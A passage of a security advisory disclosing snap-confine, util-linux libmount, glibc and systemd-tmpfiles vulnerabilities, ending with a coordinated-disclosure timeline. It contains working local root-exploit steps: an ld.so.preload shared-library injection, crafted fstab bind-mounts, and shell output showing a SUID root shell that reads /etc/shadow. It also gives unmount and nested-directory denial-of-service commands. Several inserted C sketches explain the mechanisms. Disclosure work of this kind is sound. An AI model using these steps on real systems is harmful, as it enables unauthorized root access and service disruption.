Unfortunately, because we own /tmp inside snap-store's mount namespace
(thanks to CVE-2021-44731), we can race against snap-update-ns between
1/ and 3/ and replace /tmp/.snap/var/lib -- and hence /var/lib -- with
our own directory tree.

Note: we can reliably win this race condition by "single-stepping"
snap-confine (we execute it with SNAPD_DEBUG=1, we redirect its stderr
to an AF_UNIX socket with minimized SO_RCVBUF and SO_SNDBUF, we read()
its output byte by byte, and we MSG_PEEK at its buffered output).
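The buffering mechanism behind this note can be illustrated in isolation.
The following is only a minimal, generic sketch under stated assumptions:
the helper names tiny_socketpair(), peek_byte(), and read_byte() are
hypothetical (they come from neither snapd nor any proof of concept), and
the exact minimum buffer size is decided by the kernel, not by the caller.

```c
#include <sys/socket.h>
#include <sys/types.h>

/* Hypothetical helper: create a connected AF_UNIX stream pair and ask for
 * the smallest possible buffers on both ends. The kernel silently raises
 * the requested value to its own minimum, so a writer on sv[1] blocks
 * shortly after the reader on sv[0] stops draining. */
static int tiny_socketpair(int sv[2])
{
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return -1;
    int tiny = 1;
    for (int i = 0; i < 2; i++) {
        if (setsockopt(sv[i], SOL_SOCKET, SO_SNDBUF, &tiny, sizeof(tiny)) != 0 ||
            setsockopt(sv[i], SOL_SOCKET, SO_RCVBUF, &tiny, sizeof(tiny)) != 0)
            return -1;
    }
    return 0;
}

/* Look at the next buffered byte without consuming it (MSG_PEEK).
 * Returns the byte, or -1 if nothing is buffered right now. */
static int peek_byte(int fd)
{
    unsigned char c;
    ssize_t n = recv(fd, &c, 1, MSG_PEEK | MSG_DONTWAIT);
    return n == 1 ? c : -1;
}

/* Consume exactly one byte (blocking). Returns -1 on EOF or error. */
static int read_byte(int fd)
{
    unsigned char c;
    ssize_t n = recv(fd, &c, 1, 0);
    return n == 1 ? c : -1;
}
```

A reader that alternates peek_byte() and read_byte() decides how far a
chatty writer may advance between two of its own actions, because the
writer stalls as soon as the tiny buffers are full.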
This race condition allows us to replace
/var/lib/snapd/mount/snap.snap-store.user-fstab with our own fstab file,
which allows us to set up near-arbitrary bind-mounts inside snap-store's
mount namespace. These bind-mounts are not completely arbitrary, because
they are restricted by the "snap-update-ns.snap-store" AppArmor profile,
whose most interesting rules are:

------------------------------------------------------------------------
170   mount options=(rbind, rw) /tmp/.snap/*/ -> /*/,
...
762   mount options=(rbind, rw) /tmp/.snap/var/lib/*/ -> /var/lib/*/,
------------------------------------------------------------------------

Our action plan, then, is:

- we create a copy of /etc (minus the unreadable files like /etc/shadow)
  into /tmp/.tmp/.snap/etc (which will become /tmp/.snap/etc inside
  snap-store's mount namespace);

- we create a file /tmp/.tmp/.snap/etc/ld.so.preload (which contains the
  library name "/tmp/librootshell.so"), and we create a shared library
  /tmp/.tmp/librootshell.so (which will become /tmp/librootshell.so
  inside snap-store's mount namespace);

- we bind-mount our /tmp/.tmp onto /tmp (inside snap-store's mount
  namespace) by exploiting CVE-2021-44731 (note: /tmp/snap.snap-store
  does not normally exist, but if it does, we can use our "@reboot"
  crontab trick to create it ourselves on the next reboot);

- we bind-mount the contents of /tmp/.tmp/.snap/var/lib into /var/lib
  (inside snap-store's mount namespace) by exploiting the race condition
  between 1/ and 3/ in snap-update-ns;

- we add the following bind-mount line to our
  /tmp/.tmp/.snap/var/lib/snapd/mount/snap.snap-store.user-fstab (which
  is effectively /var/lib/snapd/mount/snap.snap-store.user-fstab inside
  snap-store's mount namespace):

/tmp/.snap/etc /etc none rbind,rw 0 0

- we execute snap-confine (outside snap-store's mount namespace), which
  reads our user-fstab file and bind-mounts our copy of /etc (inside
  snap-store's mount namespace) -- this bind-mount is allowed by the
  line 170 of the "snap-update-ns.snap-store" AppArmor profile;

- we execute the SUID-root program /usr/lib/snapd/snap-confine (inside
  snap-store's mount namespace), which reads our /etc/ld.so.preload and
  therefore executes our shared library /tmp/librootshell.so, as root --
  these two operations are allowed by the "snap.snap-store.snap-store"
  AppArmor profile:

------------------------------------------------------------------------
 34   /etc/ld.so.preload r,
...
299   /tmp/** mrwlkix,
------------------------------------------------------------------------

________________________________________________________________________
First, failed attempt
________________________________________________________________________

Our first attempt succeeded in bind-mounting our own /etc but failed to
execute a SUID-root program inside snap-store's mount namespace. Indeed,
snap-confine's defensive programming detected that /var/lib/snapd does
not belong to root (it belongs to us, inside snap-store's mount
namespace), and called exit() (via validate_bpfpath_is_safe()):

------------------------------------------------------------------------
$ id
uid=1001(jane) gid=1001(jane) groups=1001(jane)

$ gcc -o CVE-2021-44731-Desktop CVE-2021-44731-Desktop.c
$ ./CVE-2021-44731-Desktop
...
change.go:316: DEBUG: mount name:"/tmp/.snap/var/lib/snapd" dir:"/var/lib/snapd" type:"" opts:MS_BIND|MS_REC unparsed:"" (error: )
...

$ cp -a /etc /tmp/.tmp/.snap
$ echo /tmp/librootshell.so > /tmp/.tmp/.snap/etc/ld.so.preload
$ gcc -fpic -shared -o /tmp/.tmp/librootshell.so librootshell.c

$ mkdir /tmp/.tmp/.snap/var/lib/snapd/mount
$ echo '/tmp/.snap/etc /etc none rbind,rw 0 0' > /tmp/.tmp/.snap/var/lib/snapd/mount/snap.snap-store.user-fstab

$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=snap-store /usr/lib/snapd/snap-confine --base core18 snap.snap-store.snap-store /usr/lib/snapd/snap-confine
...
change.go:316: DEBUG: mount name:"/tmp/.snap/etc" dir:"/etc" type:"none" opts:MS_BIND|MS_REC unparsed:"" (error: )
...
DEBUG: loading bpf program for security tag snap.snap-store.snap-store
/var/lib/snapd not root-owned 1001:1001
------------------------------------------------------------------------

________________________________________________________________________
Second, successful attempt
________________________________________________________________________

The solution to this problem is easy; because the original, root-owned
bind-mount of /var/lib still exists inside snap-store's mount namespace
(we merely renamed it, during the race condition between 1/ and 3/), we
can simply rename it back to /tmp/.snap/var/lib, and add the following
bind-mount line to our user-fstab file:

/tmp/.snap/var/lib/snapd /var/lib/snapd none rbind,rw 0 0

This bind-mount is allowed by the line 762 of the
"snap-update-ns.snap-store" AppArmor profile, and allows us to change
the ownership of /var/lib/snapd back to root, and to execute a SUID-root
program inside snap-store's mount namespace (and hence our own shared
library, as root):

------------------------------------------------------------------------
$ echo '/tmp/.snap/var/lib/snapd /var/lib/snapd none rbind,rw 0 0' >> /tmp/.tmp/.snap/var/lib/snapd/mount/snap.snap-store.user-fstab

$ mv -i /tmp/.tmp/.snap/var/lib /tmp/.tmp/.snap/var/lib.exchange2
$ mv -i /tmp/.tmp/.snap/var/lib.exchange /tmp/.tmp/.snap/var/lib

$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=snap-store /usr/lib/snapd/snap-confine --base core18 snap.snap-store.snap-store /usr/lib/snapd/snap-confine
...
change.go:316: DEBUG: mount name:"/tmp/.snap/etc" dir:"/etc" type:"none" opts:MS_BIND|MS_REC unparsed:"" (error: )
change.go:316: DEBUG: mount name:"/tmp/.snap/var/lib/snapd" dir:"/var/lib/snapd" type:"none" opts:MS_BIND|MS_REC unparsed:"" (error: )
...
DEBUG: loading bpf program for security tag snap.snap-store.snap-store
DEBUG: read 6392 bytes from /var/lib/snapd/seccomp/bpf//snap.snap-store.snap-store.bin
...
DEBUG: execv(/usr/lib/snapd/snap-confine, /usr/lib/snapd/snap-confine...)
...
------------------------------------------------------------------------

This second attempt succeeded; our shared library created a SUID-root
shell /tmp/sh that is reachable outside snap-store's mount namespace via
/tmp/.tmp/sh:

------------------------------------------------------------------------
$ /tmp/.tmp/sh -p

# id
uid=1001(jane) gid=1001(jane) euid=0(root) groups=1001(jane)
                              ^^^^^^^^^^^^

# wc /etc/shadow
  49   49 1617 /etc/shadow
------------------------------------------------------------------------


========================================================================
Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount
========================================================================

    Get a little extra help
        -- Oh No! More Lemmings, Tame Level 14

During our work on snap-confine, we explored many different avenues of
attack; most of them were dead ends, but some of them led us to the
discovery of vulnerabilities in related packages and libraries. For
example, we pondered over the beginning of snap-confine's function
sc_bootstrap_mount_namespace() for a long time:

------------------------------------------------------------------------
223         char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";
...
226         if (mkdtemp(scratch_dir) == NULL) {
...
234         sc_do_mount("none", "/", NULL, MS_REC | MS_SHARED, NULL);
...
238         sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);
...
245         sc_do_mount("none", scratch_dir, NULL, MS_UNBINDABLE, NULL);
...
254         sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,
255                     NULL);
------------------------------------------------------------------------

This function is called after unshare(CLONE_NEWNS) to set up the root
filesystem inside a snap's mount namespace:

- at lines 223-226, it creates a random, temporary scratch directory
  /tmp/snap.rootfs_XXXXXX (as root, with permissions 0700) that will
  become the snap's root filesystem;

- at lines 238-245, it bind-mounts this scratch directory onto itself,
  and makes it unbindable and private (i.e., subsequent mounts inside
  this directory will not be visible outside the snap's mount
  namespace);

- at lines 254-255, it bind-mounts the snap's root filesystem onto this
  scratch directory (for example, /snap/snapd/current, a read-only
  squashfs that contains a copy of the SUID-root snap-confine).

Our half-baked idea was: what if we were able to unmount the scratch
directory's private bind-mount, after line 245 but before line 254? The
bind-mount of the snap's root filesystem (at lines 254-255) would not be
private anymore, and would therefore be visible outside the snap's mount
namespace. In other words, we would be able to execute snap-confine via
/tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine, which reminded us
strongly of our exploit for CVE-2021-44730 (but without a hardlink).

Consequently, we audited the SUID-root programs umount and fusermount
for ways to unmount a filesystem that does not belong to us, and we
discovered CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount
(which is used internally by umount).

Note: CVE-2021-3996 and CVE-2021-3995 were both introduced by commit
5fea669 ("libmount: Support unmount FUSE mounts") in November 2018.


========================================================================
CVE-2021-3996: Unauthorized unmount in util-linux's libmount
========================================================================

In order for an unprivileged user to unmount a FUSE filesystem with
umount, this filesystem must a/ be listed in /proc/self/mountinfo, and
b/ be a FUSE filesystem (lines 466-470), and c/ belong to the current,
unprivileged user (lines 477-498):

------------------------------------------------------------------------
451 static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
452 {
...
466         if (strcmp(type, "fuse") != 0 &&
467             strcmp(type, "fuseblk") != 0 &&
468             strncmp(type, "fuse.", 5) != 0 &&
469             strncmp(type, "fuseblk.", 8) != 0)
470                 return 0;
...
477         if (mnt_optstr_get_option(optstr, "user_id", &user_id, &sz) != 0)
478                 return 0;
...
490         uid = getuid();
...
497         snprintf(uidstr, sizeof(uidstr), "%lu", (unsigned long) uid);
498         return strncmp(user_id, uidstr, sz) == 0;
499 }
------------------------------------------------------------------------

Unfortunately, when parsing /proc/self/mountinfo, the libmount blindly
removes any " (deleted)" suffix from the mountpoint pathnames (at lines
231-233):

------------------------------------------------------------------------
 17 #define PATH_DELETED_SUFFIX     " (deleted)"
------------------------------------------------------------------------
179 static int mnt_parse_mountinfo_line(struct libmnt_fs *fs, const char *s)
180 {
...
223         /* (5) target */
224         fs->target = unmangle(s, &s);
...
231         p = (char *) endswith(fs->target, PATH_DELETED_SUFFIX);
232         if (p && *p)
233                 *p = '\0';
------------------------------------------------------------------------

This vulnerability allows an unprivileged user to unmount other users'
filesystems that are either world-writable themselves (like /tmp) or
mounted in a world-writable directory (like /tmp/snap.rootfs_XXXXXX).
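The effect of lines 231-233 on a mountpoint name can be replayed outside
of libmount. This is a minimal sketch, not libmount's code: ends_with()
is a hypothetical stand-in for libmount's endswith() (assumed here to
return a pointer to the start of the suffix), and strip_deleted_suffix()
is an illustrative name.

```c
#include <string.h>

#define PATH_DELETED_SUFFIX " (deleted)"

/* Hypothetical stand-in for libmount's endswith(): returns a pointer to
 * the start of the suffix inside s, or NULL if s does not end with it. */
static char *ends_with(char *s, const char *suffix)
{
    size_t sl = strlen(s), pl = strlen(suffix);
    if (pl == 0 || sl < pl)
        return NULL;
    return memcmp(s + sl - pl, suffix, pl) == 0 ? s + sl - pl : NULL;
}

/* Same shape as lines 231-233: truncate the target in place, without
 * checking whether the mountpoint was really deleted. */
static void strip_deleted_suffix(char *target)
{
    char *p = ends_with(target, PATH_DELETED_SUFFIX);
    if (p && *p)
        *p = '\0';
}
```

With this logic, a mountpoint literally named "/tmp/ (deleted)" is
recorded as "/tmp/", which is how a user-owned FUSE mount comes to stand
in for a mountpoint that the user does not own.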
For example, on Fedora, /tmp is a tmpfs, so we can mount a basic FUSE
filesystem named "/tmp/ (deleted)" (with FUSE's "hello world" program,
./hello) and unmount /tmp itself (a denial of service):

------------------------------------------------------------------------
$ id
uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

$ grep /tmp /proc/self/mountinfo
84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel,size=2004304k,nr_inodes=409600,inode64

$ mkdir -m 0700 /tmp/" (deleted)"
$ ./hello /tmp/" (deleted)"

$ grep /tmp /proc/self/mountinfo
84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel,size=2004304k,nr_inodes=409600,inode64
620 84 0:46 / /tmp/\040(deleted) rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1000,group_id=1000

$ mount | grep /tmp
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,seclabel,size=2004304k,nr_inodes=409600,inode64)
/home/john/hello on /tmp/ type fuse.hello (rw,nosuid,nodev,relatime,user_id=1000,group_id=1000)

$ umount -l /tmp/

$ grep /tmp /proc/self/mountinfo | wc
      0       0       0
------------------------------------------------------------------------


========================================================================
CVE-2021-3995: Unauthorized unmount in util-linux's libmount
========================================================================

Alert readers may have spotted another vulnerability in
is_fuse_usermount(): at line 498, only the first "sz" characters of the
current user's uid are compared to the filesystem's "user_id" option (sz
is user_id's length).
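The prefix comparison at line 498 can be reproduced in a few lines. This
is a minimal sketch with hypothetical function names;
uid_matches_exact() shows one possible stricter check and is not
necessarily the fix that was applied upstream.

```c
#include <stdio.h>
#include <string.h>

/* Same comparison as lines 497-498: only the first sz bytes of the
 * decimal uid are compared to the "user_id" option value. */
static int uid_matches_prefix(const char *user_id, size_t sz, unsigned long uid)
{
    char uidstr[sizeof(unsigned long) * 3 + 1];
    snprintf(uidstr, sizeof(uidstr), "%lu", uid);
    return strncmp(user_id, uidstr, sz) == 0;
}

/* Illustrative stricter variant: the lengths must match as well. */
static int uid_matches_exact(const char *user_id, size_t sz, unsigned long uid)
{
    char uidstr[sizeof(unsigned long) * 3 + 1];
    snprintf(uidstr, sizeof(uidstr), "%lu", uid);
    return strlen(uidstr) == sz && memcmp(user_id, uidstr, sz) == 0;
}
```

For uid 1000 and an option string that starts with "1," (sz is 1), the
first function reports a match and the second does not.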
This second vulnerability allows an unprivileged user to unmount the
FUSE filesystems that belong to certain other users; for example, if our
own uid is 1000, then we can unmount the FUSE filesystems of the users
whose uid is 100, 10, or 1:

------------------------------------------------------------------------
$ id
uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

$ grep fuse /proc/self/mountinfo
38 23 0:32 / /sys/fs/fuse/connections rw,nosuid,nodev,noexec,relatime shared:18 - fusectl fusectl rw
620 87 0:46 / /mnt/bin rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1,group_id=1

$ umount -l /mnt/bin

$ grep fuse /proc/self/mountinfo
38 23 0:32 / /sys/fs/fuse/connections rw,nosuid,nodev,noexec,relatime shared:18 - fusectl fusectl rw
------------------------------------------------------------------------


========================================================================
Epilogue: snap-confine and CVE-2021-3996 in util-linux's libmount
========================================================================

CVE-2021-3996 in libmount allows us to unmount the private bind-mount of
snap-confine's scratch directory, between the lines 245 and 254 (we can
reliably win this race condition by "single-stepping" snap-confine with
SNAPD_DEBUG=1), which allows us to execute the bind-mounted program
/tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine.
Nonetheless, we were unable to reproduce our exploit for CVE-2021-44730
or CVE-2021-44731:

- if we execute snap-confine outside the snap's mount namespace, via
  /tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine, then we are unable
  to provide our own snap-discard-ns program because the directory
  /tmp/snap.rootfs_XXXXXX already exists and we cannot remove it;

- if we execute snap-confine inside the snap's mount namespace, via
  /var/lib/snapd/hostfs/tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine,
  then snap-confine enters init's mount namespace (outside the snap's
  mount namespace) and we are unable to provide our own snap-discard-ns
  program because the directory /var/lib/snapd/hostfs/tmp does not exist
  and we cannot create it.

If you, dear reader, find a solution to these problems, please post it
to the public oss-security mailing list!

Note: CVE-2021-3996 might be exploitable in contexts other than
snap-confine, but we have not explored this possibility.


========================================================================
CVE-2021-3998: Unexpected return value from glibc's realpath()
========================================================================

    Triple Trouble
        -- Lemmings, Taxing Level 26

While auditing umount and fusermount, we also discovered a vulnerability
in the glibc's realpath() function, which is used internally by various
programs. Normally, when the output buffer "resolved" that is passed to
realpath() is not NULL, then realpath() either returns NULL on failure,
or it returns the output buffer "resolved" on success.

Unfortunately, since commit c6e0b0b ("stdlib: Sync canonicalize with
gnulib") from January 2021, realpath() can mistakenly return a
malloc()ated buffer that is neither NULL nor the output buffer
"resolved":

------------------------------------------------------------------------
430 char *
431 __realpath (const char *name, char *resolved)
432 {
...
437   struct scratch_buffer rname_buffer;
438   return realpath_stk (name, resolved, &rname_buffer);
439 }
------------------------------------------------------------------------
197 static char *
198 realpath_stk (const char *name, char *resolved,
199               struct scratch_buffer *rname_buf)
200 {
...
399   failed = false;
...
403   if (resolved != NULL && dest - rname <= get_path_max ())
404     rname = strcpy (resolved, rname);
...
410   if (failed || rname == resolved)
411     {
412       scratch_buffer_free (rname_buf);
413       return failed ? NULL : resolved;
414     }
415
416   return scratch_buffer_dupfree (rname_buf, dest - rname);
417 }
------------------------------------------------------------------------

For example, if the input path "name" is "." and if the current working
directory is longer than PATH_MAX, then:

- at line 399, "failed" is set to false;

- at lines 403-404, "rname" is NOT set to "resolved" and "resolved" is
  left untouched and uninitialized (because "dest - rname" is longer
  than PATH_MAX);

- the code block at lines 410-414 is skipped (because "failed" is false
  and "rname" is not "resolved");

- at line 416, scratch_buffer_dupfree() returns a malloc()ated buffer
  that is NOT the output buffer "resolved".

The consequences of this vulnerability depend on the affected programs;
for example, fusermount (a SUID-root program) can disclose sensitive
information (pointers) when displaying the contents of a stack-based
buffer that is mistakenly left uninitialized by realpath() (we tested
this proof of concept on Ubuntu 21.04):

------------------------------------------------------------------------
$ gcc -o CVE-2021-3998-fusermount CVE-2021-3998-fusermount.c
$ ./CVE-2021-3998-fusermount > CVE-2021-3998-fusermount.output
...

$ hexdump -C CVE-2021-3998-fusermount.output
00000000  2f 75 73 72 2f 62 69 6e  2f 66 75 73 65 72 6d 6f  |/usr/bin/fusermo|
00000010  75 6e 74 3a 20 65 6e 74  72 79 20 66 6f 72 20 f0  |unt: entry for .|
00000020  83 9b 99 ff 7f 20 6e 6f  74 20 66 6f 75 6e 64 20  |..... not found |
00000030  69 6e 20 2f 65 74 63 2f  6d 74 61 62 0a 0a 2f 75  |in /etc/mtab../u|
00000040  73 72 2f 62 69 6e 2f 66  75 73 65 72 6d 6f 75 6e  |sr/bin/fusermoun|
00000050  74 3a 20 65 6e 74 72 79  20 66 6f 72 20 39 ac b7  |t: entry for 9..|
00000060  a5 a2 7f 20 6e 6f 74 20  66 6f 75 6e 64 20 69 6e  |... not found in|
00000070  20 2f 65 74 63 2f 6d 74  61 62 0a 0a              | /etc/mtab..|
------------------------------------------------------------------------


========================================================================
CVE-2021-3999: Off-by-one buffer overflow/underflow in glibc's getcwd()
========================================================================

    Down, along, up. In that order
        -- Lemmings, Mayhem Level 5

While studying the vulnerability in realpath(), we also discovered a
vulnerability in the glibc's getcwd() function (which is used internally
by realpath() to resolve relative pathnames) -- an off-by-one buffer
overflow and underflow, but if and only if the "size" of "buf" is
exactly 1:

------------------------------------------------------------------------
 48 __getcwd (char *buf, size_t size)
 49 {
 ..
 54   size_t alloc_size = size;
 ..
 76     path = buf;
 ..
 80   retval = INLINE_SYSCALL (getcwd, 2, path, alloc_size);
...
100   if (retval >= 0 || errno == ENAMETOOLONG)
101     {
...
110       result = __getcwd_generic (path, size);
------------------------------------------------------------------------
158 __getcwd_generic (char *buf, size_t size)
159 {
...
187   size_t allocated = size;
...
247     dir = buf;
248
249   dirp = dir + allocated;
250   *--dirp = '\0';
...
262   while (!(thisdev == rootdev && thisino == rootino))
263     {
...
441     }
...
449   if (dirp == &dir[allocated - 1])
450     *--dirp = '/';
...
457   used = dir + allocated - dirp;
458   memmove (dir, dirp, used);
------------------------------------------------------------------------

If, at line 48, the "size" of "buf" is exactly 1:

- and if, at line 80, the kernel's getcwd() syscall fails with the error
  ENAMETOOLONG (because the current working directory is longer than
  PATH_MAX),

- then, at line 110, a generic implementation of getcwd() is called;

- at line 250, a null byte is written to "dirp", which points exactly to
  "buf" (because "size", and hence "allocated", are exactly 1);

- if the code block at lines 262-441 is skipped entirely (if the current
  working directory corresponds to the "/" directory),

- then, at lines 449-450, a slash is written to "buf-1" (an off-by-one
  buffer underflow, because at line 449 "dirp" was still pointing
  exactly to "buf"),

- and, at lines 457-458, a null byte is written to "buf+1" (an
  off-by-one buffer overflow, because at line 457 "used" is exactly 2).

It may seem impossible to satisfy the condition at line 100 (the current
working directory is longer than PATH_MAX) and the condition at line 262
(the current working directory corresponds to the "/" directory), but in
reality we can:

- in a child process:

  - create an unprivileged mount namespace;

  - create a directory longer than PATH_MAX;

  - bind-mount "/" onto this directory;

  - open() this directory and send its file descriptor to the parent
    process (outside the unprivileged mount namespace);

- in the parent process:

  - receive the file descriptor of this directory (which corresponds to
    "/" and is longer than PATH_MAX) and fchdir() to it;

  - execute a SUID program that calls getcwd() with a buffer of size 1,
    which triggers the off-by-one buffer overflow and underflow.
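The pointer arithmetic walked through above (lines 247-458, with the
loop at lines 262-441 skipped) can be replayed safely on a padded
buffer. This is a minimal sketch, not glibc code: replay_getcwd_generic()
and struct replay are hypothetical names, and the caller must provide
one spare byte before and after "buf" so that the replay itself stays in
bounds.

```c
#include <stddef.h>
#include <string.h>

/* Where the '/' landed relative to buf, and how many bytes were moved. */
struct replay {
    ptrdiff_t slash_at;
    size_t used;
};

/* Replays lines 247-250 and 449-458 for the "cwd is /" case. The caller
 * guarantees that buf[-1] and buf[size] are addressable. */
static struct replay replay_getcwd_generic(char *buf, size_t size)
{
    size_t allocated = size;
    char *dir = buf;
    char *dirp = dir + allocated;

    *--dirp = '\0';                      /* line 250 */
    if (dirp == &dir[allocated - 1])     /* line 449: the loop wrote nothing */
        *--dirp = '/';                   /* line 450 */

    struct replay r;
    r.slash_at = dirp - buf;
    r.used = (size_t)(dir + allocated - dirp);   /* line 457 */
    memmove(dir, dirp, r.used);          /* line 458 */
    return r;
}
```

With a size of 1, the slash lands at offset -1 and two bytes are moved,
so the terminating null byte ends up at offset +1; with a size of 2, the
same code writes "/" and its null byte entirely inside the buffer.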
Apparently, this vulnerability was introduced in February 1995 by the
very first commit in the glibc's git history (28f540f, "initial import")
and could be triggered without an unprivileged mount namespace, by
simply chdir()ing to the "/" directory:

------------------------------------------------------------------------
190 getcwd (buf, size)
...
218     path = buf;
...
226   pathp = path + size;
227   *--pathp = '\0';
...
242   while (!(thisdev == rootdev && thisino == rootino))
243     {
...
351     }
352
353   if (pathp == &path[size - 1])
354     *--pathp = '/';
...
359   memmove (path, pathp, path + size - pathp);
------------------------------------------------------------------------

Although "the size of buf is exactly 1" is a strong requirement,
vulnerable code like the following may exist in the wild:

------------------------------------------------------------------------
#include <stdio.h>
#include <unistd.h>

int
main(int argc, char * argv[])
{
    char buf[4096];
    int len = snprintf(buf, sizeof(buf), "%s: cwd is ", argv[0]);
    if (len <= 0 || (unsigned)len >= sizeof(buf)) return __LINE__;
    if (!getcwd(buf + len, sizeof(buf) - len)) return __LINE__;
    puts(buf);
    return 0;
}
------------------------------------------------------------------------


========================================================================
CVE-2021-3997: Uncontrolled recursion in systemd's systemd-tmpfiles
========================================================================

    The Stack
        -- Oh No! More Lemmings, Crazy Level 6

While trying to exploit snap-confine via CVE-2021-3996, we explored
alternative ways to remove the scratch directory /tmp/snap.rootfs_XXXXXX
(a sufficient, and maybe necessary, condition for a successful exploit).
We therefore looked into systemd-tmpfiles (which "creates, deletes, and
cleans up volatile and temporary files and directories") and discovered
a denial of service (an uncontrolled recursion): if we create thousands
of nested directories in /tmp, then "systemd-tmpfiles --remove" (when
executed as root at boot time) will call its rm_rf_children() function
recursively (on each nested directory) and will exhaust its stack and
crash. For example, on Ubuntu 21.04:

------------------------------------------------------------------------
$ cd /tmp
$ perl -e 'use strict; for (my $i = 0; $i < (1<<15); $i++) { mkdir "A", 0700 or die; chdir "A" or die; }'
------------------------------------------------------------------------

Then, as root (warning: this command may delete important files and
directories in /tmp; it is normally executed at boot time only):

------------------------------------------------------------------------
# systemd-tmpfiles --remove
Segmentation fault (core dumped)
------------------------------------------------------------------------

We have not fully explored the implications of this vulnerability;
however, we noticed that:

- at boot time, systemd executes "systemd-tmpfiles --create --remove
  --boot --exclude-prefix=/dev";

- systemd-tmpfiles first enters the "remove" phase, and subsequently
  enters the "create" phase;

- but if systemd-tmpfiles crashes during the "remove" phase, then it
  never enters the "create" phase;

- and it fails to create the files and directories (specified in
  /usr/lib/tmpfiles.d/*.conf) that it should create at boot time;

- for example, on Ubuntu 21.04, systemd-tmpfiles fails to create the
  directory /run/lock/subsys; but because /run/lock is world-writable,
  attackers can create their own /run/lock/subsys; and because various
  legacy packages and daemons write into /run/lock/subsys as root, the
  attackers may create arbitrary files via symlinks in /run/lock/subsys.
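To make the failure mode concrete: a removal routine that recurses once
per nested directory consumes stack in proportion to an
attacker-controlled depth. One generic way to bound this is an explicit
depth limit. The sketch below only illustrates that idea; it is not
systemd's rm_rf_children() and not the patch that was applied upstream,
and the name remove_children_bounded() and the choice of ELOOP as the
error are assumptions made for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: remove everything below the directory referred to
 * by dirfd, but refuse to descend more than max_depth levels. Takes
 * ownership of dirfd. Returns 0 on success, -1 on error (errno is set to
 * ELOOP when the tree is deeper than allowed). */
static int remove_children_bounded(int dirfd, unsigned max_depth)
{
    DIR *d = fdopendir(dirfd);
    if (d == NULL) {
        int saved = errno;
        close(dirfd);
        errno = saved;
        return -1;
    }

    int ret = 0;
    struct dirent *de;
    while ((de = readdir(d)) != NULL) {
        if (strcmp(de->d_name, ".") == 0 || strcmp(de->d_name, "..") == 0)
            continue;

        struct stat st;
        if (fstatat(dirfd, de->d_name, &st, AT_SYMLINK_NOFOLLOW) != 0) {
            ret = -1;
            break;
        }
        if (S_ISDIR(st.st_mode)) {
            if (max_depth == 0) {        /* too deep: fail instead of recursing */
                errno = ELOOP;
                ret = -1;
                break;
            }
            int sub = openat(dirfd, de->d_name,
                             O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
            if (sub < 0 || remove_children_bounded(sub, max_depth - 1) != 0 ||
                unlinkat(dirfd, de->d_name, AT_REMOVEDIR) != 0) {
                ret = -1;
                break;
            }
        } else if (unlinkat(dirfd, de->d_name, 0) != 0) {
            ret = -1;
            break;
        }
    }

    int saved = errno;
    closedir(d);                         /* also closes dirfd */
    errno = saved;
    return ret;
}
```

A depth limit turns a crash into a reported error; whether a cleanup tool
should then skip the tree, or walk it iteratively instead, is a separate
design decision.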
Last-minute note: it seems impossible to trigger this vulnerability in
systemd-tmpfiles versions before commit e535840 ("tmpfiles: let's bump
RLIMIT_NOFILE for tmpfiles") from February 2019.


========================================================================
Acknowledgments
========================================================================

We thank the Ubuntu Security Team (Alex Murray and Seth Arnold in
particular) for their hard work on the snap-confine vulnerabilities. We
also thank Red Hat Product Security, Zbigniew Jedrzejewski-Szmek, Karel
Zak, Siddhesh Poyarekar, and the members of linux-distros@openwall for
their work on the systemd, util-linux, and glibc vulnerabilities.

This advisory is dedicated to 8lgm -- followers of symbolic links,
overflowers of stack buffers, and dereferencers of NULL pointers:

https://attrition.org/security/advisory/8lgm/
https://web.archive.org/web/20081203221844/packetstorm.linuxsecurity.com/poisonpen/8lgm/ptchown.c


========================================================================
Timeline
========================================================================

2021-10-27: We sent our advisory and proofs of concept to
security@ubuntu.

2021-11-10: We sent our advisory and proofs of concept (without the
snap-confine vulnerabilities) to secalert@redhat.

2021-12-29: We sent a write-up and the patch for the systemd
vulnerability to linux-distros@openwall.

2022-01-10: We published our write-up on the systemd vulnerability
(https://www.openwall.com/lists/oss-security/2022/01/10/2).

2022-01-12: Red Hat filed the glibc vulnerabilities upstream
(https://sourceware.org/bugzilla/show_bug.cgi?id=28769 and
https://sourceware.org/bugzilla/show_bug.cgi?id=28770).

2022-01-20: We sent a write-up and the patches for the util-linux
vulnerabilities to linux-distros@openwall.

2022-01-24: We published our write-up on the util-linux vulnerabilities
(https://www.openwall.com/lists/oss-security/2022/01/24/2).

2022-01-24: We published our write-up on the glibc vulnerabilities
(https://www.openwall.com/lists/oss-security/2022/01/24/4).

2022-02-03: We sent our advisory and Ubuntu sent their patches for the
snap-confine vulnerabilities to linux-distros@openwall.

2022-02-17: Coordinated Release Date (5:00 PM UTC) for the snap-confine
vulnerabilities.